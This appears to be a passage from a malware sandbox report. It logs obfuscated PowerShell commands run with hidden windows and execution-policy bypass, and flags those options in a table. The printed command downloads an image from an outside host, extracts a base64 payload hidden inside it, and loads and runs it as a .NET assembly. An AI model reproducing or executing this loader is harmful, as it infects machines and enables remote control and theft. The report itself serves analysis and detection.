OCgvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOaQBtvHbRIwOGEvHbRIwOZwBlvHbRIwOFUvHbRIwOcgBsvHbRIwOCkvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOBpvHbRIwOG0vHbRIwOYQBnvHbRIwOGUvHbRIwOVvHbRIwOBlvHbRIwOHgvHbRIwOdvHbRIwOvHbRIwOgvHbRIwOD0vHbRIwOIvHbRIwOBbvHbRIwOFMvHbRIwOeQvHbRIwOnvHbRIwOCsvHbRIwOJwBzvHbRIwOHQvHbRIwOZQBtvHbRIwOC4vHbRIwOVvHbRIwOBlvHbRIwOHgvHbRIwOdvHbRIwOvHbRIwOuvHbRIwOEUvHbRIwObgBjvHbRIwOG8vHbRIwOZvHbRIwOBpvHbRIwOG4vHbRIwOZwBdvHbRIwODovHbRIwOOgBVvHbRIwOFQvHbRIwORgvHbRIwO4vHbRIwOC4vHbRIwORwBlvHbRIwOHQvHbRIwOUwB0vHbRIwOHIvHbRIwOaQBuvHbRIwOGcvHbRIwOKvHbRIwOBivHbRIwOHUvHbRIwOMvHbRIwOBpvHbRIwOG0vHbRIwOYQBnvHbRIwOGUvHbRIwOQgB5vHbRIwOHQvHbRIwOZQBzvHbRIwOCkvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOBzvHbRIwOHQvHbRIwOYQByvHbRIwOHQvHbRIwORgBsvHbRIwOGEvHbRIwOZwvHbRIwOgvHbRIwOD0vHbRIwOIvHbRIwOBPvHbRIwOGsvHbRIwOMvHbRIwOvHbRIwO8vHbRIwODwvHbRIwOQgBBvHbRIwOFMvHbRIwORQvHbRIwO2vHbRIwODQvHbRIwOXwBTvHbRIwOFQvHbRIwOQQBSvHbRIwOFQvHbRIwOPgvHbRIwO+vHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwODsvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOZQBuvHbRIwOGQvHbRIwORgBsvHbRIwOCcvHbRIwOKwvHbRIwOnvHbRIwOGEvHbRIwOZwvHbRIwOgvHbRIwOD0vHbRIwOIvHbRIwOBPvHbRIwOGsvHbRIwOMvHbRIwOvHbRIwO8vHbRIwODwvHbRIwOQgBBvHbRIwOFMvHbRIwORQvHbRIwO2vHbRIwODQvHbRIwOXwBFvHbRIwOE4vHbRIwORvHbRIwOvHbRIwO+vHbRIwOD4vHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOBzvHbRIwOHQvHbRIwOYQByvHbRIwOHQvHbRIwOSQBuvHbRIwOGQvHbRIwOZQB4vHbRIwOCvHbRIwOvHbRIwOPQvHbRIwOgvHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOGkvHbRIwObQBhvHbRIwOGcvHbRIwOZQBUvHbRIwOGUvHbRIwOevHbRIwOB0vHbRIwOC4vHbRIwOSQBuvHbRIwOGQvHbRIwOZQB4vHbRIwOE8vHbRIwOZgvHbRIwOovHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOHMvHbRIwOdvHbRIwOBhvHbRIwOHIvHbRIwOdvHbRIwOBGvHbRIwOGwvHbRIwOYQBnvHbRIwOCkvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOBlvHbRIwOG4vHbRIwOZvHbRIwOBJvHbRIwOG4vHbRIwOZvHbRIwOBlvHbRIwOHgvHbRIwOIvHbRIwOvHbRIwO9vHbRIwOCvHbRIwOvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOaQBtvHbRIwOGEvHbRIwOZwBlvHbRIwOFQvHbRIwOZQB4vHbRIwOHQvHbRIwOLgBJvHbRIwOG4vHbRIwOZvHbRIwOBlvHbRIwOHgvHbRIwOTwBmvHbRIwOCgvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOZQBuvHbRIwOGQvHbRIwORgvHbRIwOnvHbRIwOCsvHbRIwOJwBsvHbRIwOGEvHbRIwOZwvHbRIwOpvHbRIwODsvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOcwB0vHbRIwOGEvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOcgB0vHbRIwOEkvHbRIwObgBkvHbRIwOGUvHbRIwOevHbRIwOvHbRIwOgvHbRIwOC0vHbRIwOZwBlvHbRIwOCvHbRIwOvHbRIwOMvHbRIwOvHbRIwOgvHbRIwOC0vHbRIwOYQBuvHbRIwOGQvHbRIwOIvHbRIwOBivHbRIwOHUvHbRIwOMvHbRIwOBlvHbRIwOG4vHbRIwOZvHbRIwOBJvHbRIwOG4vHbRIwOZvHbRIwOBlvHbRIwOHgvHbRIwOIvHbRIwOvHbRIwOtvHbRIwOGcvHbRIwOdvHbRIwOvHbRIwOgvHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOHMvHbRIwOdvHbRIwOBhvHbRIwOHIvHbRIwOdvHbRIwOBJvHbRIwOG4vHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOZvHbRIwOBlvHbRIwOHgvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOBzvHbRIwOHQvHbRIwOYQByvHbRIwOHQvHbRIwOSQBuvHbRIwOGQvHbRIwOZQB4vHbRIwOCvHbRIwOvHbRIwOKwvHbRIwO9vHbRIwOCvHbRIwOvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOcwB0vHbRIwOGEvHbRIwOcgB0vHbRIwOEYvHbRIwObvHbRIwOBhvHbRIwOGcvHbRIwOLgBMvHbRIwOGUvHbRIwObgBnvHbRIwOHQvHbRIwOavHbRIwOvHbRIwO7vHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOGIvHbRIwOYQBzvHbRIwOGUvHbRIwONgvHbRIwO0vHbRIwOEwvHbRIwOZQBuvHbRIwOGcvHbRIwOdvHbRIwOBovHbRIwOCvHbRIwOvHbRIwOPQvHbRIwOgvHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOGUvHbRIwObgBkvHbRIwOEkvHbRIwObgBkvHbRIwOGUvHbRIwOevHbRIwOvHbRIwOgvHbRIwOC0vHbRIwOIvHbRIwOBivHbRIwOHUvHbRIwOMvHbRIwOBzvHbRIwOHQvHbRIwOYQByvHbRIwOHQvHbRIwOSQBuvHbRIwOGQvHbRIwOZQB4vHbRIwODsvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOYgBhvHbRIwOHMvHbRIwOZQvHbRIwO2vHbRIwODQvHbRIwOQwBvvHbRIwOG0vHbRIwObQBhvHbRIwOG4vHbRIwOZvHbRIwOvHbRIwOgvHbRIwOD0vHbRIwOIvHbRIwOBivHbRIwOHUvHbRIwOMvHbRIwOBpvHbRIwOG0vHbRIwOYQBnvHbRIwOGUvHbRIwOVvHbRIwOBlvHbRIwOHgvHbRIwOdvHbRIwOvHbRIwOuvHbRIwOFMvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOdQBivHbRIwOHMvHbRIwOdvHbRIwOByvHbRIwOGkvHbRIwObgBnvHbRIwOCgvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOcwB0vHbRIwOGEvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOcgB0vHbRIwOEkvHbRIwObgBkvHbRIwOGUvHbRIwOevHbRIwOvHbRIwOsvHbRIwOCvHbRIwOvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOYgBhvHbRIwOHMvHbRIwOZQvHbRIwO2vHbRIwODQvHbRIwOTvHbRIwOBlvHbRIwOG4vHbRIwOZwB0vHbRIwOGgvHbRIwOKQvHbRIwO7vHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOGMvHbRIwObwvHbRIwOnvHbRIwOCsvHbRIwOJwBtvHbRIwOG0vHbRIwOYQBuvHbRIwOGQvHbRIwOQgB5vHbRIwOHQvHbRIwOZQBzvHbRIwOCvHbRIwOvHbRIwOPQvHbRIwOgvHbRIwOFsvHbRIwOUwB5vHbRIwOHMvHbRIwOdvHbRIwOBlvHbRIwOG0vHbRIwOLgBDvHbRIwOG8vHbRIwObgB2vHbRIwOGUvHbRIwOcgB0vHbRIwOF0vHbRIwOOgvHbRIwO6vHbRIwOEYvHbRIwOcgBvvHbRIwOG0vHbRIwOQgBhvHbRIwOHMvHbRIwOZQvHbRIwO2vHbRIwODQvHbRIwOUwB0vHbRIwOHIvHbRIwOaQBuvHbRIwOGcvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOKvHbRIwOBivHbRIwOHUvHbRIwOMvHbRIwOBivHbRIwOGEvHbRIwOcwBlvHbRIwODYvHbRIwONvHbRIwOBDvHbRIwOG8vHbRIwObQBtvHbRIwOGEvHbRIwObgBkvHbRIwOCkvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOBsvHbRIwOG8vHbRIwOYQBkvHbRIwOGUvHbRIwOZvHbRIwOBBvHbRIwOHMvHbRIwOcwBlvHbRIwOG0vHbRIwOYgBsvHbRIwOHkvHbRIwOIvHbRIwOvHbRIwO9vHbRIwOCvHbRIwOvHbRIwOWwBTvHbRIwOHkvHbRIwOcwB0vHbRIwOCcvHbRIwOKwvHbRIwOnvHbRIwOGUvHbRIwObQvHbRIwOuvHbRIwOFIvHbRIwOZQBmvHbRIwOGwvHbRIwOZQBjvHbRIwOHQvHbRIwOaQBvvHbRIwOG4vHbRIwOLgBBvHbRIwOHMvHbRIwOcwBlvHbRIwOG0vHbRIwOYgBsvHbRIwOHkvHbRIwOXQvHbRIwO6vHbRIwODovHbRIwOTvHbRIwOBvvHbRIwOGEvHbRIwOZvHbRIwOvHbRIwOovHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOGMvHbRIwObwBtvHbRIwOG0vHbRIwOYQBuvHbRIwOGQvHbRIwOQgB5vHbRIwOHQvHbRIwOZQBzvHbRIwOCkvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOB0vHbRIwOHkvHbRIwOcvHbRIwOBlvHbRIwOCvHbRIwOvHbRIwOPQvHbRIwOgvHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOGwvHbRIwObwBhvHbRIwOGQvHbRIwOZQBkvHbRIwOEEvHbRIwOcwBzvHbRIwOGUvHbRIwObQBivHbRIwOGwvHbRIwOeQvHbRIwOuvHbRIwOEcvHbRIwOZQB0vHbRIwOFQvHbRIwOeQBwvHbRIwOGUvHbRIwOKvHbRIwOBPvHbRIwOGsvHbRIwOMvHbRIwOBDvHbRIwOGwvHbRIwOYQBzvHbRIwOHMvHbRIwOTvHbRIwOvHbRIwOnvHbRIwOCsvHbRIwOJwBpvHbRIwOGIvHbRIwOcgBhvHbRIwOHIvHbRIwOeQvHbRIwOzvHbRIwOC4vHbRIwOQwBsvHbRIwOGEvHbRIwOcwBzvHbRIwODEvHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOKQvHbRIwO7vHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOG0vHbRIwOZQB0vHbRIwOGgvHbRIwObwBkvHbRIwOCvHbRIwOvHbRIwOPQvHbRIwOgvHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOHQvHbRIwOeQBwvHbRIwOGUvHbRIwOLgBHvHbRIwOGUvHbRIwOdvHbRIwOBNvHbRIwOGUvHbRIwOdvHbRIwOBovHbRIwOG8vHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOZvHbRIwOvHbRIwOovHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOFIvHbRIwOdQBuvHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOCkvHbRIwOLgBJvHbRIwOG4vHbRIwOdgBvvHbRIwOGsvHbRIwOZQvHbRIwOovHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOG4vHbRIwOdQBsvHbRIwOGwvHbRIwOLvHbRIwOvHbRIwOgvHbRIwOFsvHbRIwObwBivHbRIwOGovHbRIwOZQBjvHbRIwOHQvHbRIwOWwBdvHbRIwOF0vHbRIwOIvHbRIwOvHbRIwOovHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOGQvHbRIwOSvHbRIwOvHbRIwOnvHbRIwOCsvHbRIwOJwBovHbRIwODvHbRIwOvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOTvHbRIwOBrvHbRIwODEvHbRIwOSvHbRIwOBXvHbRIwOGkvHbRIwOOvHbRIwOB3vHbRIwOE0vHbRIwORvHbRIwOBNvHbRIwOHYvHbRIwOTwBDvHbRIwODQvHbRIwOegBOvHbRIwOEMvHbRIwONvHbRIwOvHbRIwO0vHbRIwOE0vHbRIwOagBJvHbRIwOHUvHbRIwOTgBqvHbRIwOFkvHbRIwOdgBMvHbRIwOHovHbRIwOcvHbRIwOB3vHbRIwOGQvHbRIwOSvHbRIwOBSvHbRIwOG8vHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOIvHbRIwOvHbRIwOsvHbRIwOCvHbRIwOvHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOIvHbRIwOvHbRIwOsvHbRIwOCvHbRIwOvHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOMgBPvHbRIwOGsvHbRIwOMvHbRIwOvHbRIwOgvHbRIwOCwvHbRIwOIvHbRIwOBPvHbRIwOGsvHbRIwOMvHbRIwOByvHbRIwOGUvHbRIwOZwBhvHbRIwOHMvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwObQBPvHbRIwOGsvHbRIwOMvHbRIwOvHbRIwOgvHbRIwOCwvHbRIwOIvHbRIwOBPvHbRIwOGsvHbRIwOMvHbRIwOvHbRIwO2vHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOCvHbRIwOvHbRIwOLvHbRIwOvHbRIwOgvHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOEMvHbRIwOOgBtvHbRIwOEsvHbRIwOMwBQvHbRIwOHIvHbRIwObwBnvHbRIwOHIvHbRIwOYQBtvHbRIwOEQvHbRIwOYQB0vHbRIwOGEvHbRIwObQBLvHbRIwODMvHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOLvHbRIwOvHbRIwOgvHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOGgvHbRIwOdvHbRIwOBtvHbRIwOGwvHbRIwOagBpvHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOCkvHbRIwOKQvHbRIwOnvHbRIwOCkvHbRIwOIvHbRIwOvHbRIwOtvHbRIwOHIvHbRIwOZQBQvHbRIwOGwvHbRIwOYQBjvHbRIwOGUvHbRIwOJwBPvHbRIwOGsvHbRIwOMvHbRIwOvHbRIwOnvHbRIwOCwvHbRIwOWwBDvHbRIwOGgvHbRIwOYQByvHbRIwOF0vHbRIwOMwvHbRIwO5vHbRIwOC0vHbRIwOQwBSvHbRIwOGUvHbRIwOUvHbRIwOBsvHbRIwOGEvHbRIwOYwBFvHbRIwOCvHbRIwOvHbRIwOIvHbRIwOvHbRIwOnvHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOCcvHbRIwOLvHbRIwOBbvHbRIwOEMvHbRIwOavHbRIwOBhvHbRIwOHIvHbRIwOXQvHbRIwOzvHbRIwODYvHbRIwOIvHbRIwOvHbRIwOgvHbRIwOC0vHbRIwOcgBlvHbRIwOFvHbRIwOvHbRIwObvHbRIwOBhvHbRIwOGMvHbRIwOZQvHbRIwOnvHbRIwOG0vHbRIwOSwvHbRIwOzvHbRIwOCcvHbRIwOLvHbRIwOBbvHbRIwOEMvHbRIwOavHbRIwOBhvHbRIwOHIvHbRIwOXQvHbRIwO5vHbRIwODIvHbRIwOKQvHbRIwOgvHbRIwOHwvHbRIwOIvHbRIwOvHbRIwOuvHbRIwOCvHbRIwOvHbRIwOKvHbRIwOvHbRIwOgvHbRIwOCQvHbRIwORQBuvHbRIwOFYvHbRIwOOgBDvHbRIwOG8vHbRIwOTQBzvHbRIwOFvHbRIwOvHbRIwOZQBDvHbRIwOFsvHbRIwONvHbRIwOvHbRIwOsvHbRIwODIvHbRIwONvHbRIwOvHbRIwOsvHbRIwODIvHbRIwONQBdvHbRIwOC0vHbRIwOagBPvHbRIwOGkvHbRIwOTgvHbRIwOnvHbRIwOCcvHbRIwOKQvHbRIwO=';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('vHbRIwO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('bu0imageUrl = Ok0https://uploaddei'+'magen'+'s.com.br/ima'+'ges/004/683/779/original/download.jpg?1701878864Ok0;bu0webClient = New-Object System.Net.WebClient;bu0imageBytes = bu0webCl'+'ient.DownloadData(bu0imageUrl);bu0imageText = [Sy'+'stem.Text.Encoding]::UTF8.GetString(bu0imageBytes);bu0startFlag = Ok0<<BASE64_START>>Ok0;bu0endFl'+'ag = Ok0<<BASE64_END>>Ok0;bu0startIndex = bu0imageText.IndexOf(bu0startFlag);bu0endIndex = '+'bu0imageText.IndexOf(bu0endF'+'lag);bu0sta'+'rtIndex -ge 0 -and bu0endIndex -gt bu0startIn'+'dex;bu0startIndex += bu0startFlag.Length;bu0base64Length = bu0endIndex - bu0startIndex;bu0base64Command = bu0imageText.S'+'ubstring(bu0sta'+'rtIndex, bu0'+'base64Length);bu0co'+'mmandBytes = [System.Convert]::FromBase64String'+'(bu0base64Command);bu0loadedAssembly = [Syst'+'em.Reflection.Assembly]::Load(bu0commandBytes);bu0type = bu0loadedAssembly.GetType(Ok0ClassL'+'ibrary3.Class1Ok0);bu0method = bu0type.GetMetho'+'d(Ok0RunOk0).Invoke(bu0null, [object[]] (Ok0dH'+'h0'+'Lk1HWi8wMDMvOC4zNC44MjIuNjYvLzpwdHRoOk0 , Ok0Ok0 , Ok02Ok0 , Ok0regas'+'mOk0 , Ok06Ok0 , Ok0C:mK3ProgramDatamK3Ok0, Ok0htmljiOk0))') -rePlace'Ok0',[Char]39-CRePlacE 'bu0',[Char]36 -rePlace'mK3',[Char]92) | . ( $EnV:CoMsPeC[4,24,25]-jOiN'')" |
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |